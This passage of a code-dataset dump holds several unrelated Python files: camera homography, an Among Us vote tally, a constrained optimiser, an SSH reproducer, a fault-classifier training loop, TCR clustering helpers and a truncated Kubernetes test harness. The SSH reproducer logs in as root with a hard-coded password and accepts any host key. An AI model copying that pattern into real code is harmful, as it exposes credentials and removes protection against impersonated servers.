get_homography_matrices(self, kmats, r_mats, t_vec):\n device_ = kmats.device\n batch_size = r_mats.shape[0]\n num_dep = self.num_depths\n r_mats = r_mats.view(batch_size, 1, 3, 3).expand(batch_size, num_dep, 3, 3)\n r_mats = r_mats.contiguous().view(-1, 3, 3)\n t_vec = t_vec.view(batch_size, 1, 3, 1).contiguous().expand(batch_size, num_dep, 3, 1)\n t_vec = t_vec.contiguous().view(-1, 3, 1)\n kinv = torch.stack([torch.inverse(k) for k in kmats])\n kmats = kmats.view(-1, 1, 3, 3).expand(batch_size, num_dep, 3, 3).contiguous()\n kinv = kinv.view(-1, 1, 3, 3).expand(batch_size, num_dep, 3, 3).contiguous()\n kinv, kmats = kinv.view(-1, 3, 3), kmats.view(-1, 3, 3)\n n = torch.Tensor([0, 0, 1]).view(1, 1, 3).expand(r_mats.shape[0], 1, 3)\n n = n.to(device_).float()\n depth_proposals = self.depth_proposals.view(1, num_dep, 1).to(device_)\n depth_proposals = depth_proposals.expand(batch_size, num_dep, 1).contiguous()\n depth_proposals = depth_proposals.view(-1, 1, 1)\n num_1 = torch.bmm(torch.bmm(torch.bmm(r_mats.permute(0, 2, 1), t_vec), n), r_mats.permute(0, 2, 1))\n den_1 = -depth_proposals - torch.bmm(torch.bmm(n, r_mats.permute(0, 2, 1)), t_vec)\n h_mats = torch.bmm(torch.bmm(kmats, (r_mats.permute(0, 2, 1) + (num_1 / den_1))), kinv)\n h_mats = h_mats.view(batch_size, num_dep, 3, 3)\n return 
h_mats\n\n def forward(self, kmats, r_mats, t_vecs):\n hmats_1 = self.get_homography_matrices(kmats, r_mats, t_vecs)\n return hmats_1","repo_name":"tedyhabtegebrial/gvsnet","sub_path":"models/mpi/compute_homography.py","file_name":"compute_homography.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"75020914471","text":"'''amogus'''\n\n\ndef main():\n '''sugoma'''\n dic = {}\n ded = []\n ded_crew = []\n alive_crew = []\n sussy = 0\n while True:\n dict_in = input()\n if dict_in[:2] == '{\"':\n temp = dict_in.replace('\"}', '').replace('{\"', '').split('\" : \"')\n dic[temp[0]] = temp[1]\n if dict_in == 'Start':\n break\n while True:\n vote = input()\n if vote == 'End':\n break\n ded.append(vote)\n for i, j in sorted(dic.items()):\n if i in ded:\n ded_crew.append({i: j})\n else:\n if j == 'Impostor':\n sussy += 1\n alive_crew.append({i: j})\n res(sussy, alive_crew, ded_crew)\n\n\ndef res(sussy, alive_crew, ded_crew):\n '''heheboi'''\n print('%d Impostor Remains' % sussy)\n print('***Alive***')\n for i in alive_crew:\n for j, k in i.items():\n print(j, k, sep=' : ')\n print('***Dead***')\n for i in ded_crew:\n for j, k in i.items():\n print(j, k, sep=' : ')\n\n\nmain()\n","repo_name":"Maldin0/Python","sub_path":"155-Impostor.py","file_name":"155-Impostor.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19830918538","text":"\nimport numpy as np\nfrom src import utils\n\n\ndef interior_pt(func, ineq_constraints, eq_constraints_mat, eq_constraints_rhs, x0):\n # variable eq_constraints_rhs is left unused because we assume feasible start and remain feasible\n t = 1\n mu = 10\n ineq_tol = 1e-9 # tolerance for m/t\n m = len(ineq_constraints)\n func_to_minimize = LogBarrier(func, ineq_constraints, t)\n full_path = np.array([x0])\n max_iter = 4000\n newton_tol = ineq_tol/10 # tolerance for newton decrement\n n_outer_loop = 0\n while m/t >= ineq_tol:\n n_outer_loop += 1\n print(\"\\n\")\n print(\"Minimizing log-barrier function with t = \" + str(t) + \":\")\n print(\"\\n\")\n # find minimizer\n tmp_path, tmp_is_converged, tmp_report_str = newton_constrained_method(func_to_minimize, x0, newton_tol, max_iter, eq_constraints_mat)\n if not tmp_is_converged:\n full_path = np.append(full_path, tmp_path[1:, :], axis=0)\n final_val, grad = func_to_minimize(full_path[-1, :])\n report_str = \"Convergence Failed in interior loop, Reached X = \" + str(tmp_path[-1, :]) + \", Objective function value:\" + str(final_val/t) + '\\n'\n report_str += 't value: ' + str(t)\n return full_path, report_str\n # update t\n t *= mu\n func_to_minimize.t = t\n # update x0 to the last convergence point\n x0 = tmp_path[-1, :]\n full_path = np.append(full_path, tmp_path[1:, :], axis=0)\n # report convergence\n final_val, grad = func_to_minimize(full_path[-1, :])\n report_str = \"Converged at X = \" + str(tmp_path[-1, :]) + \", Objective function value:\" + str(final_val/t) + \", m/t sub-optimality:\" + str(m/t) + '\\n'\n report_str += 'Number of outer iterations: ' + str(n_outer_loop) + ', number of total inner iterations: ' + str(full_path.shape[0])\n report_str += ', final t value: ' + str(t)\n return full_path, report_str\n\n\ndef newton_constrained_method(f, x0, newton_tol, max_iter, eq_constraints_mat):\n full_path = np.zeros([max_iter + 1, len(x0)])\n full_path[0, :] = x0\n # newton method, assuming equality 
constraints with feasible start\n is_converged = 0\n i = 0\n x = x0\n back_track_factor = 0.2\n wolfe_slope_ratio = 1e-4\n num_eq_constraints = np.shape(eq_constraints_mat)[0]\n # convergence loop\n while i < max_iter and is_converged == 0:\n func_val, grad, hess = f(x, calc_hessian=True)\n # repeatedly solve the local quadratic problem with the equality constraints to preserve feasibility\n # assuming feasible start so no accounting for residual\n if num_eq_constraints > 0:\n kkt_mat = np.append(hess, np.transpose(eq_constraints_mat), axis=1)\n tmp_mat = np.append(eq_constraints_mat, np.zeros((num_eq_constraints, num_eq_constraints)))\n kkt_mat = np.append(kkt_mat, [tmp_mat], axis=0)\n kkt_rhs = np.append(-grad, np.zeros(num_eq_constraints))\n else:\n kkt_mat = hess\n kkt_rhs = -grad\n sol = np.linalg.solve(kkt_mat, kkt_rhs)\n pk = sol[0:len(x0)] # step direction\n # w = sol[len(x0):] # new lagrange multipliers, not needed in this method\n\n # apply wolfe condition on step size\n step_size = 1 # initial un-damped step length\n x_new = x + step_size * pk\n func_val_new, grad_new = f(x_new)\n while func_val_new > func_val + wolfe_slope_ratio * step_size * np.dot(grad, pk) or np.isnan(func_val_new):\n # backtrack\n step_size *= back_track_factor\n # update x and obj function\n x_new = x + step_size * pk\n func_val_new, grad_new = f(x_new)\n # save x\n full_path[i + 1, :] = x_new\n # calculate newton decrement\n newton_decrement = np.sqrt(np.dot(pk, np.dot(hess, pk)))\n # calculate obj function change\n val_change = np.abs(func_val_new-func_val)\n # print report to console\n report_str = utils.report_iteration(i, x_new, func_val_new, newton_decrement, val_change)\n # check convergence\n if (newton_decrement**2)/2 < newton_tol:\n is_converged = 1\n full_path = np.delete(full_path, (np.arange(i + 1, len(full_path))), 0)\n print(\"Convergence achieved at iteration: \" + str(i) + \", Function value: \"\n + str(func_val_new) + \", Args: \" + str(x_new))\n return full_path, is_converged, report_str\n # prepare next iteration\n x = x_new\n i += 1\n # if we reached here convergence has failed\n\n return full_path, is_converged, report_str\n\n\nclass LogBarrier:\n # function-like class for calling a function with log barrier\n def __init__(self, func, ineq_constraints, t):\n self.func = func\n self.ineq_constraints = ineq_constraints\n self.t = t\n\n def __call__(self, x, calc_hessian=False):\n outputs = self.func(x, calc_hessian)\n val = outputs[0]*self.t\n grad = outputs[1]*self.t\n if calc_hessian:\n hessian = outputs[2]*self.t\n for f in self.ineq_constraints:\n val_i, grad_i = f(x)\n val -= np.log(-val_i)\n # from lecture 9 slide 7, with hessian of constraints = 0:\n grad -= grad_i / val_i\n if calc_hessian:\n hessian += np.outer(grad_i, np.transpose(grad_i)) / (val_i ** 2) # + 0\n if calc_hessian:\n return val, grad, hessian\n else:\n return val, grad\n\n\n# NOT FINISHED, NOT USED, WRITTEN FOR INFEASIBLE START, WHICH IS NOT THE CASE IN THIS EXERCISE\ndef primal_dual_method(f, x0, res_tol, max_iter, eq_constraints_mat, eq_constraints_rhs):\n # this method does not assume feasible start\n x = x0\n w_prev = []\n backtrack_factor = 0.2\n alpha = 0.25\n is_converged = 0\n i = 0\n num_constraints = len(eq_constraints_rhs)\n while i < max_iter and is_converged == 0:\n val, grad, hess = f(x, calc_hessian=True)\n # solve linear system in order to get primal and dual directions\n kkt_mat = np.append(hess,np.transpose(eq_constraints_mat),axis=1)\n tmp_mat = 
np.append(eq_constraints_mat,np.zeros((num_constraints, num_constraints)))\n kkt_mat = np.append(kkt_mat, [tmp_mat], axis=0)\n kkt_rhs = np.append(-grad, eq_constraints_rhs)\n sol = np.linalg.solve(kkt_mat, kkt_rhs)\n pk = sol[0:len(x0)] # primal solution\n w = sol[len(x0):] # dual solution\n # line search along direction pk (wolfe condition) on residual\n\n if len(w_prev) == 0:\n # first iteration, no change in w\n w_prev = w\n delta_nu = w - w_prev # change in lagrange multipliers\n t = 1\n residual = calc_residual(grad, eq_constraints_mat, eq_constraints_rhs, x, w)\n residual_t = calc_residual(grad, eq_constraints_mat, eq_constraints_rhs, x + t * pk, w + t * delta_nu)\n while (1 - alpha*t)*np.sqrt(np.dot(residual, residual)) < np.sqrt(np.dot(residual_t, residual_t)):\n t *= backtrack_factor\n residual_t = calc_residual(grad, eq_constraints_mat, eq_constraints_rhs, x + t * pk, w + t * delta_nu)\n\n # update x and w\n x += pk * t\n w += delta_nu * t\n # check convergence\n if np.dot(eq_constraints_mat, x) == eq_constraints_rhs and residual_t < res_tol:\n is_converged = 1\n\n # prepare for next iteration\n w_prev = w\n\n\ndef calc_residual(gradient, eq_constraints_mat, eq_constraints_rhs, x, v):\n # calculate residual\n r_dual = gradient + np.dot(np.transpose(eq_constraints_mat), v)\n r_primal = np.dot(eq_constraints_mat, x) - eq_constraints_rhs\n return np.append(r_dual, r_primal)\n","repo_name":"shira-shafir/constrained_opt","sub_path":"src/constrained_min.py","file_name":"constrained_min.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27884555446","text":"# REPRODUCER for (suspected) Paramiko limitation:\n# The largest output Paramiko can handle when recv_exit_status() is \n# called first is 2097152 bytes, which is exactly 2 MiB. Any larger\n# than that and it hangs. 
\n# If I move recv_exit_status() to after the read(), Paramiko sails\n# past that limit without issue.\n# NOTE: with these version this issue is not observed\n# 3.6.8 (default, Oct 19 2021, 05:14:06) \n# [GCC 8.5.0 20210514 (Red Hat 8.5.0-3)]\n# 2.8.1 <-- paramiko version\n##############################################################\n\nimport sys\nimport paramiko\n\nprint(sys.version)\nprint(paramiko.__version__)\n\nclient = paramiko.client.SSHClient()\n##client.load_system_host_keys()\n##client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\ntry:\n client.connect(hostname='127.0.0.1', username=\"root\", password=\"100yard-\",\n port=22, timeout=2)\nexcept Exception as _e:\n sys.stdout.write(str(_e))\n sys.exit(1)\n\noutput_len = 2097150\n\nwhile True:\n stdin, stdout, stderr = client.exec_command(\n 'printf %{}s'.format(output_len),\n get_pty=True)\n\n exit_status = stdout.channel.recv_exit_status()\n stdout_output = stdout.read().decode('utf8').rstrip('\\n')\n\n print(len(stdout_output))\n output_len += 1\n\n","repo_name":"jharriga/BootTime","sub_path":"Sandbox/rcv_exit_status.py","file_name":"rcv_exit_status.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18668505154","text":"from __future__ import print_function\nimport sys\nimport argparse\nimport time\nimport random\nimport torch\nimport numpy as np\nimport sys\nsys.path.append(\"..\")\nfrom main_ce import set_loader\nfrom utils.util import AverageMeter, set_optimizer\nfrom utils.util import accuracy\nfrom networks.DRSN import DRSN_CW\n\n\n\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for training')\n\n parser.add_argument('--print_freq', type=int, default=1,\n help='print frequency')\n parser.add_argument('--batch_size', type=int, default=128,\n help='batch_size')\n parser.add_argument('--num_workers', type=int, default=0,\n help='num of workers to use')\n parser.add_argument('--epochs', type=int, default=200,\n help='number of training epochs')\n\n # optimization\n parser.add_argument('--learning_rate', type=float, default=0.1,\n help='learning rate')\n parser.add_argument('--weight_decay', type=float, default=1e-4,\n help='weight decay')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='momentum')\n\n parser.add_argument('--data_folder',\n type=str,\n default=None,\n help='path to custom dataset')\n # model dataset\n parser.add_argument('--model', type=str, default='DRSN')\n parser.add_argument('--dataset', type=str, default='CWRU_signal',\n choices=['gear_fault_signal', 'CWRU_signal', 'XMU_Motor_signal'], help='dataset')\n\n\n opt = parser.parse_args()\n\n # set the path according to the environment\n if opt.data_folder is None:\n raise ValueError('No data folder Input!!')\n\n opt.model_name = '{}_{}_lr_{}_decay_{}_bsz_{}'.\\\n format(opt.dataset, opt.model, opt.learning_rate, opt.weight_decay,\n opt.batch_size)\n\n \n\n return opt\n\n\ndef set_model(opt):\n model = DRSN_CW()\n model = model.cuda()\n criterion = torch.nn.CrossEntropyLoss()\n return model, criterion\n\n\ndef train(train_loader, model, criterion, optimizer, epoch, opt):\n \"\"\"one epoch training\"\"\"\n model.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n end = time.time()\n for idx, (singals, labels) in enumerate(train_loader):\n data_time.update(time.time() - 
end)\n\n singals = singals.float().cuda(non_blocking=True)\n labels = labels.long().cuda(non_blocking=True) \n bsz = labels.shape[0]\n\n # compute loss\n output = model(singals)\n\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # SGD\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # print info\n if (idx + 1) % opt.print_freq == 0:\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, idx + 1, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1))\n sys.stdout.flush()\n\n return losses.avg, top1.avg\n\n\ndef validate(val_loader, model, criterion, opt):\n \"\"\"validation\"\"\"\n model.eval()\n\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n with torch.no_grad():\n end = time.time()\n for idx, (signals, labels) in enumerate(val_loader):\n signals = signals.float().cuda()\n labels = labels.long().cuda()\n bsz = labels.shape[0]\n\n # forward\n output = model(signals)\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if idx % opt.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n idx, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1))\n\n print(' * Acc@1 {top1.avg:.3f}'.format(top1=top1))\n return losses.avg, top1.avg\n\n\ndef main():\n random.seed(0)\n np.random.seed(0)\n torch.manual_seed(0)\n torch.cuda.manual_seed_all(0)\n \n best_acc = 0\n opt = parse_option()\n # build data loader\n train_loader, val_loader = set_loader(opt)\n\n # build model and criterion\n model, criterion = set_model(opt)\n\n # build optimizer\n # optimizer = torch.optim.Adam(model.parameters(),\n # lr=opt.learning_rate,\n # weight_decay=opt.weight_decay)\n optimizer = set_optimizer(opt, model)\n # lr_scheduler\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=[40, 80], gamma = 0.1)\n # training routine\n for epoch in range(1, opt.epochs + 1):\n\n # train for one epoch\n time1 = time.time()\n loss, acc = train(train_loader, model, criterion,\n optimizer, epoch, opt)\n time2 = time.time()\n print('Train epoch {}, total time {:.2f}, accuracy:{:.2f}'.format(\n epoch, time2 - time1, acc))\n lr_scheduler.step()\n loss, val_acc = validate(val_loader, model, criterion, opt)\n\n if val_acc > best_acc:\n best_acc = val_acc\n\n print('best accuracy: {:.2f}'.format(best_acc))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JoaquinChou/SigSiam","sub_path":"baselines/main_drsn.py","file_name":"main_drsn.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71433141353","text":"\"\"\"\nSimple set of functions for summarizing over a group\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport re\n\n\ndef filter_is(df, col, val):\n return 
df[df[col] == val]\n\ndef filter_in(df, col, vals):\n ind = [np.any(x in vals) for x in df[col]]\n return df[ind]\n\ndef filter_gt(df, col, val):\n return df[df[col] > val]\n\ndef filter_lt(df, col, val):\n return df[df[col] < val]\n\n\ndef is_subset(set1, set2):\n \"\"\"\n Return True, if all members of set2 are contained in set1. \n i.e., set2 is a subset of set1. See example for clarity:\n Example\n -------\n >>> is_subset(set([\"A\",\"B\"]), set([\"A\"]))\n True\n >>> is_subset(set([\"A\",\"B\"]), set([\"A\",\"C\"]))\n False\n \"\"\"\n return set(set2)-set(set1) == set()\n\n\ndef is_almost_subset(set1, set2, min_set_diff = 2):\n \"\"\"\n Return True, if fewer than min_set_diff members of set2 \n are missing from set1. \n i.e., set2 is almost a subset of set1. See example for clarity:\n \n Example\n -------\n >>> is_almost_subset(set([\"A\",\"B\",\"C\",\"D\"]), set([\"A\", \"K\"]), 2)\n True\n >>> is_almost_subset(set([\"A\",\"B\",\"C\",\"D\"]), set([\"A\", \"K\"]), 1)\n False\n\n \"\"\"\n return len(set(set2)-set(set1)) < min_set_diff\n\n\ndef test_for_subsets(list_of_sets):\n \"\"\"\n\n test_for_subsets (formerly known as turtles_all_the_way_down)\n\n For a ranked list of sets, return a vector where 1 \n indicates the set is not a subset of any of the sets\n that come before it in the list. \n\n This is useful for eliminating clusters (sets) of TCRs\n which are smaller than a higher ranked and larger set \n that contains all its members. See example for clarity:\n\n Example \n -------\n >>> test_for_subsets([[\"A\",\"B\",\"C\"], [\"A\",\"C\",\"D\"], [\"A\",\"D\"], [\"B\",\"E\"],[\"B\",\"C\"]])\n [1, 1, 0, 1, 0] \n >>> test_for_subsets([ [1,2,3], [1,3,4], [1,4], [2,5],[2,3]])\n [1, 1, 0, 1, 0]\n \"\"\"\n tracker = [1]\n if isinstance(list_of_sets, pd.Series):\n list_of_sets = list_of_sets.to_list()\n checked_sets = [list_of_sets[0]]\n for s in list_of_sets[1:]:\n if np.any([is_subset(cs, s) for cs in checked_sets]):\n tracker.append(0)\n else: \n tracker.append(1)\n checked_sets.append(s)\n assert len(tracker) == len(list_of_sets)\n return tracker\n\n\ndef test_for_almost_subsets(list_of_sets, thr = 3):\n \"\"\"\n\n test_for_almost_subsets (formerly known as turtles_all_the_way_down)\n\n For a ranked list of sets, return a vector where 1 \n indicates the set is not almost a subset of any of the sets\n that come before it in the list. \n\n This is useful for eliminating clusters (sets) of TCRs\n which are smaller than a higher ranked and larger set \n that contains all its members. 
See example for clarity:\n\n Example \n -------\n >>> test_for_almost_subsets([[\"A\",\"B\",\"C\"], [\"A\",\"C\",\"D\"], [\"A\",\"D\"], [\"B\",\"E\"],[\"B\",\"C\"]], 1)\n [1, 1, 0, 1, 0] \n >>> test_for_almost_subsets([ [1,2,3], [1,3,4], [1,4], [2,5],[2,3]], 1)\n [1, 1, 0, 1, 0]\n \"\"\"\n tracker = [1]\n if isinstance(list_of_sets, pd.Series):\n list_of_sets = list_of_sets.to_list()\n checked_sets = [list_of_sets[0]]\n for s in list_of_sets[1:]:\n if np.any([is_almost_subset(cs, s, thr) for cs in checked_sets]):\n tracker.append(0)\n else: \n tracker.append(1)\n checked_sets.append(s)\n assert len(tracker) == len(list_of_sets)\n return tracker\n\n\n\ndef _dist_summ(data, precision = 1, scientific = True):\n \"\"\"\n Summarise distribution [as min,q1,median,q3, max]\n \n Parameters\n ----------\n data : list\n List of numeric data\n precision : int\n How many integers precision in scientific notation = 1, \n scientific : bool\n Default is True, to return result in scientific notation \n\n Examples\n --------\n >>> _dist_summ([1,2,3,4,5])\n ['1.e+00', '2.e+00', '3.e+00', '4.e+00', '5.e+00']\n \n _dist_summ([1,2,3,4,5], scientific=False)\n [1, 2.0, 3.0, 4.0, 5]\n\n \"\"\"\n dmin = np.min(data)\n dQ1 = np.percentile(data, q = 25, interpolation = 'midpoint') \n dmedian = np.median(data)\n dQ3 = np.percentile(data, q = 75, interpolation = 'midpoint') \n dmax = np.max(data)\n r = [dmin, dQ1, dmedian, dQ3, dmax]\n if scientific:\n return [np.format_float_scientific(s, precision = precision) for s in r]\n else:\n return r \n\n\n\ndef _select(df, iloc_rows, col = 'cdr3_b_aa'):\n return df.iloc[iloc_rows,][col].to_list()\n\ndef _summ(df, indices, column = None , f=None, fdf = None, **kwargs):\n \"\"\"\n _summ implements a split, apply some function, combine result routine. 
\n \n Parameters\n ----------\n f : callable\n a function callable on a list of series\n fdf : callable\n a function callable on a dataframe\n df : pd.DataFrame\n DataFrame\n indices : list\n list of lists containing integers corresponding to the iloc rows of the < df >\n column : str or None\n column name, should be None if using a fdf\n \n Returns\n -------\n summary : list of identical length to indices\n\n Examples\n --------\n >>> from tcrdist.summarize import _summ, _occurs_N_str, _top_N_str\n >>> df = pd.DataFrame({'catvar':[\"a\",\"b\",\"b\",\"c\"], \"numvar\":[10,1,100,3]})\n >>> _summ(df, indices = [[0,1], [2,3]], column = 'numvar', f = np.median)\n [5.5, 51.5]\n >>> _summ(df, indices = [[0,1], [2,3]], column = 'catvar', f = _occurs_N_str, N = 2)\n ['b (50.0%), a (50.0%)', 'c (50.0%), b (50.0%)']\n >>> _summ(df, indices = [[0,1], [2,3]], column = 'catvar', fdf = _top_N_str, **{'col': 'catvar', 'count_col': 'numvar','N':2})\n ['a (90.9%), b (9.1%)', 'b (97.1%), c (2.9%)']\n \"\"\"\n summary = list()\n for ind in indices:\n if f is not None:\n if isinstance(df.iloc[ind, ][column], pd.Series):\n selection = df.iloc[ind, ][column].to_list()\n else:\n selection = df.iloc[ind, ][column]\n summary.append(f(selection, **kwargs))\n elif fdf is not None:\n selection = df.iloc[ind, ]\n summary.append(fdf(selection, **kwargs))\n else:\n raise(ValueError(\"No function (f) or function on a DataFrame (fdf) was supplied\\n\"))\n assert len(summary) == len(indices)\n return summary\n\ndef _occurs_N_str(m, N):\n \"\"\"\n Return occurrences in a pd.Series as a string \n\n Example\n -------\n >>> _occurs_N_str([\"a\",\"b\",\"b\",\"c\"], 1)\n 'b (50.0%)' \n >>> _occurs_N_str([\"a\",\"b\",\"b\",\"c\"], 2)\n 'b (50.0%), c (25.0%)' \n >>> _occurs_N_str([\"a\",\"b\",\"b\",\"c\"], 3)\n 'b (50.0%), c (25.0%), a (25.0%)'\n \"\"\"\n if isinstance(m, pd.Series):\n gby = m.value_counts()\n else:\n m = pd.Series(m)\n gby = m.value_counts()\n gby = 100 * gby / gby.sum()\n gby = gby.sort_values(ascending=False)\n out = ', '.join(['%s (%2.1f%%)' % (idx, v) for idx,v in gby.iteritems()][:N])\n return out\n\n\ndef _top_N_str(m, col, count_col, N):\n \"\"\"\n Example\n -------\n >>> df = pd.DataFrame({'catvar':[\"a\",\"b\",\"b\",\"c\"], \"numvar\":[10,1,100,3]})\n >>> _top_N_str(df, col = 'catvar', count_col ='numvar', N=2)\n 'b (88.6%), a (8.8%)'\n \"\"\"\n gby = m.groupby(col)[count_col].agg(np.sum)\n gby = 100 * gby / gby.sum()\n gby = gby.sort_values(ascending=False)\n out = ', '.join(['%s (%2.1f%%)' % (idx, v) for idx,v in gby.iteritems()][:N])\n return out\n\n\ndef _extract_percentage(s, key):\n \"\"\"\n extractor for pattern '%s (%2.1f%%)', see examples for clarity\n\n Parameters\n ----------\n s : str\n string pattern '%s (%2.1f%%)','%s (%2.1f%%)','%s (%2.1f%%)'\n key : str\n key for the percentage you want to extract\n\n Returns \n -------\n tuple (str, float)\n \n Examples \n --------\n >>> _extract_percentage('naive_CD8 (100.0%)', 'naive_CD8')\n ('naive_CD8', '100.0')\n\n >>> _extract_percentage('naive_CD8 (100.0%)', 'PBMC')\n ('PBMC', 0.0)\n\n >>> _extract_percentage('naive_CD8 (94.1%), PBMC (5.9%)', 'PBMC')\n ('PBMC', '5.9')\n \"\"\"\n ls = s.split(\",\")\n try: \n rs = [re.search(pattern = '([A-Za-z0-9_]+) [(]([0-9]+[\\.][0-9])%[)]', string = s) for s in ls]\n rgs = [reg.groups() for reg in rs]\n return (key, {k:v for k,v in rgs}[key])\n except:\n return key, 0.0\n\n\n\ndef member_summ(res_df, clone_df, key_col = 'neighbors_i', count_col='count', addl_cols=[], addl_n=1):\n \"\"\"Return additional summary 
info about each result (row)) based on the members of the cluster.\n\n This is helpful for preparing strings to add to the tooltip in hierdiff.plot_hclust_props.\n \n Parameters\n ----------\n res_df : pd.DataFrame [nclusters x result cols]\n Returned from neighborhood_diff or hcluster_diff\n clone_df : pd.DataFrame [nclones x metadata]\n Contains metadata for each clone.\n key_col : str\n Column in res_df that specifies the iloc of members in the clone_df\n count_col : str\n Column in clone_df that specifies counts.\n Default none assumes count of 1 cell for each row.\n addl_cols : list\n Columns to summarize\n addl_n : int\n Number of top N clones to include in the summary of\n each cluster.\n\n Returns\n -------\n summ : pd.DataFrame [nclusters x summary columns]\n Columns that can be joined with res_df\n\n\n Example\n -------\n summ_df = member_summ(res_df, clone_df)\n res_df = res_df.join(summ_df, how='left')\"\"\"\n def _top_N_str(m, col, count_col, N):\n gby = m.groupby(col)[count_col].agg(np.sum)\n gby = 100 * gby / gby.sum()\n gby = gby.sort_values(ascending=False)\n out = ', '.join(['%s (%2.1f%%)' % (idx, v) for idx,v in gby.iteritems()][:N])\n return out\n \n split = []\n for resi, res_row in res_df.iterrows():\n m = clone_df.iloc[res_row[key_col]]\n\n mode_i = m[count_col].idxmax()\n summ = {}\n for c in [c for c in clone_df.columns if 'cdr3' in c]:\n summ[c] = _top_N_str(m, c, count_col, 1)\n for c in [c for c in clone_df.columns if 'gene' in c]:\n summ[c] = _top_N_str(m, c, count_col, 3)\n\n x_val_cols = [c for c in res_df.columns if 'x_val_' in c]\n x_freq_cols = [c for c in res_df.columns if 'x_freq_' in c]\n \n for label_col, freq_col in zip(x_val_cols, x_freq_cols):\n summ[res_row[label_col]] = np.round(res_row[freq_col], 3)\n\n for c in [c for c in addl_cols]:\n summ[c] = _top_N_str(m, c, count_col, addl_n)\n summ = pd.Series(summ, name=resi)\n split.append(summ)\n summ = pd.DataFrame(split)\n return summ","repo_name":"kmayerb/tcrdist3","sub_path":"tcrdist/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"40954576721","text":"import os\nimport subprocess\nimport tempfile\nimport time\nimport yaml\nfrom urllib import request\n\nclass WattTesting:\n def __init__(self):\n self.qotm_manifests = \"\"\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: qotm\nspec:\n selector:\n service: qotm\n ports:\n - port: 80\n targetPort: http-api\n---\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: qotm\nspec:\n selector:\n matchLabels:\n service: qotm\n replicas: 1\n strategy:\n type: RollingUpdate\n template:\n metadata:\n annotations:\n sidecar.istio.io/inject: \"false\"\n labels:\n service: qotm\n spec:\n serviceAccountName: ambassador\n containers:\n - name: qotm\n image: datawire/qotm:1.3\n imagePullPolicy: Always\n ports:\n - name: http-api\n containerPort: 5000\n\"\"\"\n\n def create_namespace(self, namespace):\n namespace_manifest = f\"\"\"\n---\napiVersion: v1\nkind: Namespace\nmetadata:\n name: {namespace}\n\"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=namespace_manifest)\n\n def manifests(self):\n pass\n\n def apply_manifests(self):\n pass\n\n @staticmethod\n def run_and_assert(command, communicate=True):\n print(f\"Running command {command}\")\n output = subprocess.Popen(command, stdout=subprocess.PIPE)\n if communicate:\n stdout, stderr = output.communicate()\n print('STDOUT', 
stdout.decode(\"utf-8\") if stdout is not None else None)\n print('STDERR', stderr.decode(\"utf-8\") if stderr is not None else None)\n assert output.returncode == 0\n return stdout.decode(\"utf-8\") if stdout is not None else None\n return None\n\n def install_ambassador(self, namespace):\n if namespace is None:\n namespace = 'default'\n\n self.create_namespace(namespace)\n\n final_yaml = []\n ambassador_yaml_path = \"/buildroot/ambassador/docs/yaml/ambassador/ambassador-rbac.yaml\"\n with open(ambassador_yaml_path, 'r') as f:\n ambassador_yaml = list(yaml.safe_load_all(f))\n\n for manifest in ambassador_yaml:\n if manifest.get('kind', '') == 'Deployment' and manifest.get('metadata', {}).get('name', '') == 'ambassador':\n # we want only one replica of Ambassador to run\n manifest['spec']['replicas'] = 1\n\n # let's fix the image\n manifest['spec']['template']['spec']['containers'][0]['image'] = os.environ['AMBASSADOR_DOCKER_IMAGE']\n\n # we don't want to do everything in /ambassador/\n manifest['spec']['template']['spec']['containers'][0]['env'].append({\n 'name': 'AMBASSADOR_CONFIG_BASE_DIR',\n 'value': '/tmp/ambassador'\n })\n\n final_yaml.append(manifest)\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=yaml.safe_dump_all(final_yaml))\n\n namespace_crb = f\"\"\"\n---\napiVersion: 